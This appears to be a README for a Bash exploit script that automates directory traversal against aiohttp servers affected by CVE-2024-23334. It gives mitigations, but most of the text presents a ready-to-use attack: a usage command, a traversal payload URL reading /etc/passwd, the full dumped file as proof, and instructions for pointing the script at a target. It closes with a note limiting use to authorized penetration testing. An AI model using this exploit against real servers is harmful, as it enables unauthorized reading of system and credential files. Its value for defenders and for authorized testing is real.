A Bash script to automate Local File Inclusion (LFI) attacks on vulnerable aiohttp servers, specifically targeting CVE-2024-23334. This exploit allows for unauthorized access to arbitrary files on systems running affected versions of aiohttp with improperly configured static routes.
The CVE-2024-23334 vulnerability affects the aiohttp asynchronous HTTP client/server framework for Python and asyncio. It arises when aiohttp is used as a web server with static routes, which can create directory traversal vulnerabilities if misconfigured. This allows an attacker to access arbitrary files on the system without authorization.
Mitigations for this vulnerability include:
- Upgrading to aiohttp version 3.9.2 or later, where the issue is resolved.
- Disabling the `follow_symlinks` option in the server configuration.
- Using a reverse proxy to prevent direct access to sensitive files.
The script has the following features:
- Automates directory traversal attacks up to 15 levels to reach targeted files.
- Provides feedback on server availability and verifies successful file access.
- Configurable payload paths for adapting the script to specific testing environments.
Requirement: `curl` must be installed on your system, as the script uses it for making HTTP requests.
To execute the script, run the following command:
```bash
./lfi_aiohttp.sh -f /path/to/file/to/dump
```
If all goes well you should see a result similar to:
```text
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
[+] File dumped successfully.
```
Important: The `main_url` and `payload` variables in the script may need to be adjusted depending on the target environment.
- `main_url`: This variable should be set to the URL of the target aiohttp server (e.g., `http://localhost:8080`). Modify it according to the actual server address you're testing against.
- `payload`: This variable represents the static file route on the server (e.g., `/assets/`). Ensure this path matches the configuration of the target server's static file directory.

Before running the script, review these variables to ensure they are correctly configured for your testing scenario. Incorrect settings may result in failed attempts to access files or unintended behavior.
Options:
- `-f`: Specifies the file to dump from the server.
- `-h`: Displays the help panel with usage instructions.
This script is intended for educational purposes and authorized penetration testing only. Unauthorized use of this script is prohibited and may be illegal.